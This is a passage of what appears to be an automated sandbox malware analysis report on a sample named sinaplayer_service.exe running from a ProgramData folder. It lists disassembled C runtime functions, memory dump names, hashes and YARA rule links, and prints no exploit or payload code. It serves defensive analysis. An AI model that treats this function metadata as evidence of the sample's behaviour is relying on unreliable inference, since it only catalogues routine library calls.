                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D5855
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0D5860
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_fileno_ftell_nolock_invalid_parameter_noinfo_lock_lock_file_lseek_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2873353448-0
                                                                                                                                                                                                    • Opcode ID: fca1da38d7ae5c550d88df6c579d3f95fc8fd3f39be792590edd92c8706dd86a
                                                                                                                                                                                                    • Instruction ID: acf1d94e3aad4e3d4a56a733946f6dfab3378cbf32d73ccaf94af1339eb58625
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca1da38d7ae5c550d88df6c579d3f95fc8fd3f39be792590edd92c8706dd86a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF0E571D15706AAFB019BB488007EF7BA8AF51378F264205E624EF1D1DFB889019B51
                                                                                                                                                                                                    Function 6D0A0868 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A0823
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A082F
                                                                                                                                                                                                      • Part of subcall function 6D0A079C: __p__iob.MSVCR120(6D0A0842,6D0A0850,00000010), ref: 6D0A079C
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D0A0850,00000010), ref: 6D0A086C
                                                                                                                                                                                                    • _fputwc_nolock.MSVCR120(0000000A,-00000020,6D0A0850,00000010), ref: 6D0A0877
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_fputwc_nolock
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2527319753-0
                                                                                                                                                                                                    • Opcode ID: ea08cd8df3f4cef15fff2a9b3225199a89dc65d4b5cd1cd4267ee9ad5d2cbd37
                                                                                                                                                                                                    • Instruction ID: 43ffc86f3cabc0ca2affe96922355a7575588bf62d98976eed47fb834ad3f49d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea08cd8df3f4cef15fff2a9b3225199a89dc65d4b5cd1cd4267ee9ad5d2cbd37
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85E0D8B7C9C30A25BA0557F69C0177C33E0EB582687A90105E610DF1D1DF2580815619
                                                                                                                                                                                                    Function 6D0ADC2C Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_wfsopen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 972587971-0
                                                                                                                                                                                                    • Opcode ID: d620637660ca66bae960d0bd9af8fdd34ac1d04a99c57386e333e1e896d64d61
                                                                                                                                                                                                    • Instruction ID: 7dd73f06cca4404df4afb72af5ec993fc5133eb086bbd7c0b14b5fe501767237
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d620637660ca66bae960d0bd9af8fdd34ac1d04a99c57386e333e1e896d64d61
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69E092313942266BFB125EA8EC01BAA77A8AF05B50F064021FA14DF250E7A1E9109BD5
                                                                                                                                                                                                    Function 6D0FA73D Relevance: 6.0, APIs: 4, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0FA744
                                                                                                                                                                                                    • free.MSVCR120(?,00000004,6D0F9F0E), ref: 6D0FA771
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000004,6D0F9F0E), ref: 6D0FA779
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000004,6D0F9F0E), ref: 6D0FA781
                                                                                                                                                                                                      • Part of subcall function 6D0F4A30: QueryDepthSList.KERNEL32(6D160EF0,?,?,6D0ECE25,00000004,6D0ECB35), ref: 6D0F4A50
                                                                                                                                                                                                      • Part of subcall function 6D0F4A30: InterlockedPushEntrySList.KERNEL32(6D160EF0,?,?,?,6D0ECE25,00000004,6D0ECB35), ref: 6D0F4A5E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$List$DepthEntryH_prolog3InterlockedPushQuery
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 76379577-0
                                                                                                                                                                                                    • Opcode ID: e38fcfe78b75d90c89bb8bed85a1d32787d139280c3f726f11fac2a2733b9351
                                                                                                                                                                                                    • Instruction ID: d49a7b2f9ca6bdc0e0407bfe8813aca9e5e5e7c6a338ae59c6c8f9acfb80d348
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e38fcfe78b75d90c89bb8bed85a1d32787d139280c3f726f11fac2a2733b9351
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AE09271D057019FFF209F20C901B6D77B07F0530CF114C1CAA915B651CBF6A8119B86
                                                                                                                                                                                                    Function 6D0FBD25 Relevance: 6.0, APIs: 4, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _set_error_mode.MSVCR120(00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FBD27
                                                                                                                                                                                                    • _set_error_mode.MSVCR120(00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FBD34
                                                                                                                                                                                                      • Part of subcall function 6D0FB3D7: _errno.MSVCR120(?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FB402
                                                                                                                                                                                                      • Part of subcall function 6D0FB3D7: _invalid_parameter_noinfo.MSVCR120(?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D0FB40D
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0FBD4C
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0FBD56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _set_error_mode$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1239817535-0
                                                                                                                                                                                                    • Opcode ID: 20b0c91ade8dbb02c72076a67344e40671a68112e5af28f4707ed0914149f291
                                                                                                                                                                                                    • Instruction ID: 696f396037ed047162437cc7f550f1caf66b9f0dc69c0aba463dd5490747260c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20b0c91ade8dbb02c72076a67344e40671a68112e5af28f4707ed0914149f291
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5D0C9356CC34BD8F52A92A12822F3922944F02A28F35002AEF205D8D1FFA1D0C35C27
                                                                                                                                                                                                    Function 6D0AE071 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _ismbblead.MSVCR120(?,6D160F00,6D160F00,00000000,?,6D0AE1FE,6D160F00,00000000,00000000,?,?), ref: 6D0AE0BE
                                                                                                                                                                                                    • _ismbblead.MSVCR120(00000001,6D160F00,6D160F00,00000000,?,6D0AE1FE,6D160F00,00000000,00000000,?,?), ref: 6D0AE170
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _ismbblead
                                                                                                                                                                                                    • String ID: {m
                                                                                                                                                                                                    • API String ID: 1022365105-1004063311
                                                                                                                                                                                                    • Opcode ID: 85d838b51eb862aed91b8dfc5636f2c0138bdec6ef44faa5f95fa0aca8309c21
                                                                                                                                                                                                    • Instruction ID: 7dbc5cbfa9a29f12d464eea61def318277d365811f5da9f837bfc5e805b9145a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85d838b51eb862aed91b8dfc5636f2c0138bdec6ef44faa5f95fa0aca8309c21
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F651A2353083A7CFFB168EA984507BA7BF1AF9A350F58946AD8D287247D3308492CB51
                                                                                                                                                                                                    Function 6D0B26E2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                    • API String ID: 2959964966-2564639436
                                                                                                                                                                                                    • Opcode ID: b79c2e3454769652b0aa0f9c2ddf8543e09c92f503a29b2d6d2d203676df23b5
                                                                                                                                                                                                    • Instruction ID: 8d777ace83120cede139a93dd904f16339e3a895df11cf3699ba2d026706691e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b79c2e3454769652b0aa0f9c2ddf8543e09c92f503a29b2d6d2d203676df23b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8751873125A741DEE731CE6D84907897BF1DB2B258F38819ED8A44B252C37BD84BC762
                                                                                                                                                                                                    Function 6D0AEFAF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                                    • API String ID: 0-123907689
                                                                                                                                                                                                    • Opcode ID: eaffb736c70da9831b547ffc88d9b76e9718cc6a2c1efe1c865bc4693b0c627f
                                                                                                                                                                                                    • Instruction ID: 596230253943812d21286c4cd1ae366731db970976060acae2c43d4657654d05
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaffb736c70da9831b547ffc88d9b76e9718cc6a2c1efe1c865bc4693b0c627f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B321066964427796FB245F98D800B7C3BF8EF45B91F59C14BFDA49F281EA704982C3A0
                                                                                                                                                                                                    Function 6D0B2D31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,6D161218,00000104,?,?,?,?,?,?,6D0B2903), ref: 6D0B2D4F
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6D0B2D9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: y[
                                                                                                                                                                                                    • API String ID: 2373854079-3866484319
                                                                                                                                                                                                    • Opcode ID: 5486cc26006c76aff849cdeb20fffe0f77de7afb743d41b0c965b8529cf7052a
                                                                                                                                                                                                    • Instruction ID: d730ed210188374bccfc21dd8285e3d1753eac87c5384c03aea890a06560e060
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5486cc26006c76aff849cdeb20fffe0f77de7afb743d41b0c965b8529cf7052a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1193B2909109ABAB30DFB8DC80EFF77FCEA463647510279E511D7180E7B29A4087A1
                                                                                                                                                                                                    Function 6D0AE1B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,6D160F00,00000104,?,?,?,?,?,?,6D0AE27B), ref: 6D0AE1D4
                                                                                                                                                                                                    • _malloc_crt.MSVCR120 ref: 6D0AE21C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileModuleName_malloc_crt
                                                                                                                                                                                                    • String ID: 0'Z
                                                                                                                                                                                                    • API String ID: 2373854079-2320578061
                                                                                                                                                                                                    • Opcode ID: 39963c036e207a4ee710a2808dc591486e54e0e66753dbcbda91f5dac52dbbf5
                                                                                                                                                                                                    • Instruction ID: 56e4e747a35eb66939c953d6153cf82fd3da9f59f27a32d196b3cae5dd480f13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39963c036e207a4ee710a2808dc591486e54e0e66753dbcbda91f5dac52dbbf5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311C8F6604548BBEB11CFE89981EBF77BCFA86324B540356E520C3182E7755E4087B1
                                                                                                                                                                                                    Function 6D0B0E26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0B1D5C: GetModuleFileNameW.KERNEL32(00000000,C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe,00000104,?,?,?,?,?,?,6D0B0E43), ref: 6D0B1D7A
                                                                                                                                                                                                      • Part of subcall function 6D0B1D5C: _malloc_crt.MSVCR120 ref: 6D0B1DC9
                                                                                                                                                                                                    • ___crtGetEnvironmentStringsW.LIBCMT ref: 6D0B0E66
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: GetEnvironmentStringsW.KERNEL32(?,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A95BE
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: _malloc_crt.MSVCR120(-00000002,005C2D90,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A95EB
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: memcpy.MSVCR120(00000000,00000000,-00000002,005C2D90,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8), ref: 6D0A95FB
                                                                                                                                                                                                      • Part of subcall function 6D0A95B9: FreeEnvironmentStringsW.KERNEL32(00000000,005C2D90,?,?,6D0A9DA3,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9607
                                                                                                                                                                                                      • Part of subcall function 6D0A9704: wcslen.MSVCR120(00000000,?,005C2D90,?,6D0A9DAD,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9727
                                                                                                                                                                                                    • ___mbtow_environ.LIBCMT ref: 6D0D3BAE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$_malloc_crt$FileFreeModuleName___crt___mbtow_environmemcpywcslen
                                                                                                                                                                                                    • String ID: y[
                                                                                                                                                                                                    • API String ID: 2833736322-3866484319
                                                                                                                                                                                                    • Opcode ID: 33f5bdb22bc4e9b29a22856edd1e9e36c2895f6d153a1d237170c795e0735e2f
                                                                                                                                                                                                    • Instruction ID: f4e3bffb15224acc8bb433c8c1ad0e7e95fbf2a144542b2ac00683c4390ccce7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33f5bdb22bc4e9b29a22856edd1e9e36c2895f6d153a1d237170c795e0735e2f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 590119B460E615CFEB00DF7AE150B5937F4EB0A398B004416EA14CB310D7B6D841CBA5
                                                                                                                                                                                                    Function 6D0B3E44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,00000003,6D0AC7FC,00000000,00000001,?,00000001), ref: 6D0B3E66
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000001), ref: 6D0B3E95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
